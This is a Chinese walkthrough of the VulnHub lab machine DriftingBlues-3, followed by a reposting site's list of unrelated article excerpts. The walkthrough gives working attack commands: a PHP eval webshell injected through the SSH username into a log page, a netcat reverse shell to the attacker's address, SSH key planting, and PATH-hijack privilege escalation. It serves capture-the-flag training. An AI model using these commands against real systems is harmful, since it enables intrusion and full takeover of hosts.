vulnhub靶场之driftingblues-3

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested  vtx/amdv enabled. you can contact me by email for troubleshooting or  questions.
This works better with VirtualBox rather than VMware
 

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-3,656/
 

image-20240206202713671

3.靶场启动

image-20240206202740200

靶场网段我们知道是192.168.1.0/24,我们进行探测

二.信息收集

1.寻找靶场真实ip

nmap -sP 192.168.1.0/24
 

image-20240206203023389

arp-scan -l
 

image-20240206203110854

靶场真实ip地址为192.168.1.8
 

2.探测端口及服务

nmap -p- -sV 192.168.1.8
 

image-20240206203247089

发现开启了22端口,服务为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.38 ((Debian))
 

三.渗透测试

1.访问web服务

http://192.168.1.8
 

image-20240206203653556

2.扫描web服务

1)nikto扫描

nikto -h http://192.168.1.8
 

image-20240206203922196

我们扫描到三个目录,一个一个进行访问

image-20240206204008218

image-20240206204031885

image-20240206204049741

发现只有robots.txt目录是有信息的,其他的都没有用

2)dirsearch目录扫描

dirsearch -u 192.168.1.8 -e * -x 403 --random-agent
 

image-20240206204405924

还是只有robots.txt目录,那么我们进行分析即可

3.渗透测试

1)访问robots.txt

http://192.168.1.8/robots.txt
 

image-20240206204456418

我们继续访问

http://192.168.1.8/eventadmins/
 

image-20240206204530574

我们继续访问

http://192.168.1.8/littlequeenofspades.html
 

image-20240206204608365

我们访问源代码,可以看到一串base64编码,我们进行解密

image-20240206204725055

image-20240206204828018

最后解密出来是一个目录,我们进行访问

http://192.168.1.8/adminsfixit.php
 

image-20240206204909039

我们可以看到是ssh日志记录,那么我们可以试试一句话木马连接ssh,会不会被记录

2)ssh日志记录

ssh '<?php @eval($_POST['MS02423']);?>'@192.168.1.8
 

image-20240206205235001

我们连接蚁剑,发现可以连接成功

image-20240206210144181

image-20240206210205634

这样我们就可以反弹shell了

3)反弹shell

方法一:我们使用cmd进行反弹

http://192.168.1.8/adminsfixit.php/?cmd=system(%27nc%20-e%20/bin/bash%20192.168.1.9%205555%27);
 

image-20240206210921157

我们可以看到反弹成功

image-20240206210950397

方法二:我们使用蚁剑虚拟终端进行反弹

image-20240206211425460

image-20240206211450472

我们可以看到反弹成功,这两个方法都可以试试

4)SSH密钥

分析查看靶机内文件,发现home目录下有一个robertj用户,且该用户目录下存在两个文件,user.txt”文件没有权限无法打开,.ssh 目录有可读可写可执行权限,进入 .ssh 目录进行查看,发现目录内没有任何文件内容

image-20240206212334888

继续查看分析,查看ssh配置文件(默认目录/etc/ssh/sshd_config),发现可以公钥登录,并且给出了公钥文件存放目录 /home/robertj/.ssh/authorized_keys

image-20240206212709475

image-20240206212849011

尝试把公钥放入.ssh目录内,使用 ssh-keygen工具生成公密钥,并将生成的密钥保存到 /home/robertj/.ssh/ 目录下

ssh-keygen -t rsa
-t    指定生成的密钥类型,默认为RSA类型
 

image-20240206213858683

我们可以看到写入成功

image-20240206220853065

将生成的公钥内容输出到authorized_keys文件内

image-20240206221005812

查看私钥文件,将内容复制出来,粘贴到本地文件中, 注意要将id_rsa文件的权限修改为与创建时权限一致

image-20240206221124000

5)ssh登录

我们进行登录

ssh robertj@192.168.1.8 -i '/home/kali/桌面/1.txt' 
 

image-20240206221327567

我们查看user.txt,看到第一个flag

image-20240206221416157

6)提权

我们使用sudo -l查看,发现没有

image-20240206221623865

那么我们使用另一条命令,使用 find 命令寻找suid程序,发现一个可疑程序/usr/bin/getinfo

find / -perm -4000 -type f 2>/dev/null
 

image-20240206221720045

执行该程序,根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令

image-20240206221952961

可以通过修改环境来进行命令劫持提权

通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令(在检索环境时会先调用最前面的环境也就是最新写入的环境),来达到提权的效果

export PATH=/tmp/:$PATH             把/tmp路径写入到系统路径中
cd /tmp
echo '/bin/bash' > ip                       把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)
chmod +x ip                                    给ip文件增加执行权限
 

image-20240206222242713

我们查看flag即可

image-20240206222331559

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/289296.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python的一些知识点

在C C Java中&#xff0c;基本数据类型变量&#xff08;将常量数据存储在变量空间当中&#xff09; int a 3; int b 4; 在C C中&#xff0c;指针变量&#xff08;存储的是变量的物理内存地址&#xff09; int a 3; int* b; b &a; int** c; c &b; printf("%d&…

JAVA面试大全之并发篇

目录 1、并发基础 1.1、多线程的出现是要解决什么问题的? 本质什么? 1.2、Java是怎么解决并发问题的? 1.3、线程安全有哪些实现思路? 1.4、如何理解并发和并行的区别? 1.5、线程有哪几种状态? 分别说明从一种状态到另一种状态转变有哪些方式? 1.6、通常线程有哪几…

Web开发基本流程

Web是全球广域网&#xff0c;能够通过浏览器访问的网站。我们要访问网站&#xff0c;首先要在浏览器输入对应的域名。 浏览器也是一个程序&#xff0c;京东的网站也是一个程序&#xff0c;在京东那边电脑运行着&#xff0c;我们只是通过浏览器远程访问。京东的程序由三个部分组…

【生活】如何学习理财

文章目录 1. 了解基本财务知识2. 制定预算4321理财法则 3. 学习投资知识股票债券基金外汇房地产 4. 了解保险知识人身保险人寿保险健康保险意外伤害保险 财产保险财产损失保险责任保险信用保险 5. 寻求专业建议6. 持续学习和实践参考 首先我们想文心一言提问&#xff1a;如何学…

自媒体用ChatGPT批量洗稿软件V5.9环境配置/软件设置教程【汇总】

大家好&#xff0c;我是淘小白~ 首先&#xff0c;感谢大家的支持~~ ChatGPT采集洗稿软件V5.9版本更新&#xff0c;此次版本更新修改增加了一些内容&#xff1a; 1、自定义多条指令&#xff0c;软件自动判断指令条数&#xff0c;进行输入 2、增加谷歌浏览多账号轮询&#xf…

教育建筑智慧能源管理平台解决方案【新型电力系统下的绿色校园能源管理平台】

一、行业特点 1.建筑类型多&#xff1a;集教学、科研、生活于一体&#xff0c;占地面积大&#xff0c;建筑类型多&#xff0c;功能划分复杂。 2.供电可靠性要求高&#xff1a;教育建筑中的高层建筑、图书馆、实验楼等特级和一级负荷比较多&#xff0c;一旦发生故障会危及生命…

基于Python实现多功能翻译助手(下)

为了将上述步骤中的功能增强与扩展具体化为代码&#xff0c;我们将实现翻译历史记录功能、翻译选项配置以及UI的改进。 翻译历史记录功能 import json # 假设有一个用于存储历史记录的json文件 HISTORY_FILE translation_history.json # 初始化历史记录列表 translati…

Vue3+Element Plus+TS开发企业管理后台(一)

系列文章&#xff0c;讲述一个企业管理后台的前后端设计&#xff0c;持续集成常见的页面功能和服务端设计思路。 效果展示 支持多种布局、主题配色随意切换 侧边菜单背景设置 主题色调切换 移动端完美适配 菜单侧边收起&#xff0c;适合移动端小空间场景。 功能开发计划 #merm…

VTK9.2.0+Qt5.14.0 绘制点云

背景 为了显示结构光重建后的点云&#xff0c;开发QT5.14.0VTK9.2.0的上位机软件&#xff0c;用于对结构光3D相机进行控制&#xff0c;并接收传输回来的3D数据&#xff0c;显示在窗口中。 配置QT和VTK VTK9.2.0下载源码&#xff0c;用Cmake编译&#xff0c;编译好的VTK9.2.0…

Markdown 编辑器使用

CSDN 在博客开头加上 [TOC](你的目录标题)就可以根据博客内容自动生成如下所示的目录&#xff1a; 你的目录标题 Markdown 编辑器功能快捷键合理的创建标题&#xff0c;有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表无序列表…

JavaScript基础练习题之求斐波那契数列第N项的值

一、什么是斐波那契数列&#xff1a; 斐波那契数列是一个数列&#xff0c;从0和1开始&#xff0c;后面的每一项都是前两项的和。也就是说&#xff0c;斐波那契数列的第n项是前两项的和&#xff0c;可以表示为F(n) F(n-1) F(n-2)&#xff0c;其中F(0) 0&#xff0c;F(1) 1。…

软件杯 深度学习 机器视觉 人脸识别系统 - opencv python

文章目录 0 前言1 机器学习-人脸识别过程人脸检测人脸对其人脸特征向量化人脸识别 2 深度学习-人脸识别过程人脸检测人脸识别Metric Larning 3 最后 0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; 深度学习 机器视觉 人脸识别系统 该项目…

蓝桥杯 - 小明的背包3(多重背包)

解题思路&#xff1a; 动态规划 多重背包问题需要在01背包问题&#xff08;不重复&#xff09;的基础上多加一层循环进行遍历&#xff0c;并且dp[ j ]的式子也需要修改 import java.util.Scanner;public class Main {public static void main(String[] args) {Scanner scan …

Nginx超详细讲解+实操

前言 nginx作为当今火爆的、高性能的http及反向代理服务&#xff0c;不管前端还是后端&#xff0c;都需要全面去了解&#xff0c;学习&#xff0c;实操。 nginx 介绍 为了有一个全面的认知&#xff0c;接下来我们先来看看nginx的架构以及一些特点。 nginx 特点 处理响应请…

6.1 图的基本概念试题

一、单项选择题 01&#xff0e;图中有关路径的定义是()。 A.由顶点和相邻顶点序偶构成的边所形成的序列 B.由不同顶点所形成的序列 C.由不同边所形成的序列 D.上述定义都不是 02&#xff0e;一个有n个顶点和n条边的无向图一…

Python入门练习 - 学生管理系统

Python 实现读书管理系统 """ 实现一个命令行版的读书管理系统 """ import os.path import sys# 使用这个全局变量&#xff0c;来管理所有的学生信息 # 这个列表的每个元素都是一个‘字典’&#xff0c;每 个 字典就分别表示了一个同学students …

南京观海微电子---Vitis HLS设计流程介绍——Vitis HLS教程

1. 传统的FPGA设计流程 传统的RTL设计流程如下图所示&#xff1a; 传统的FPGA RTL设计流程主要是采用VHDL、VerilogHDL或System Verilog进行工程的开发&#xff0c;同时也是通过硬件描述语言来编写测试案例&#xff08;Test Bench&#xff09;对开发的工程进行仿真验证。 随后…

八大排序算法之希尔排序

希尔排序是插入排序的进阶版本&#xff0c;他多次调用插入排序&#xff0c;在插入排序上进行了改造&#xff0c;使其处理无序的数据时候更快 核心思想&#xff1a;1.分组 2.直接插入排序&#xff1a;越有序越快 算法思想&#xff1a; 间隔式分组&#xff0c;利用直接插入排序…

Windows安装Odoo结合内网穿透实现公网访问本地企业管理系统

文章目录 前言1. 下载安装Odoo&#xff1a;2. 实现公网访问Odoo本地系统&#xff1a;3. 固定域名访问Odoo本地系统 前言 Odoo是全球流行的开源企业管理套件&#xff0c;是一个一站式全功能ERP及电商平台。 开源性质&#xff1a;Odoo是一个开源的ERP软件&#xff0c;这意味着企…

工业以太网无线网桥

一、功能概述 1.1设备简介 本产品是工业以太网&#xff08;Profinet、EtherNet/IP、ModbusTCP等&#xff09;转无线设备&#xff0c;成对使用&#xff08;一对一&#xff09;&#xff0c;本产品出厂前已经配对好&#xff0c;用户不需要再配对&#xff0c;即插即用。 本产品适…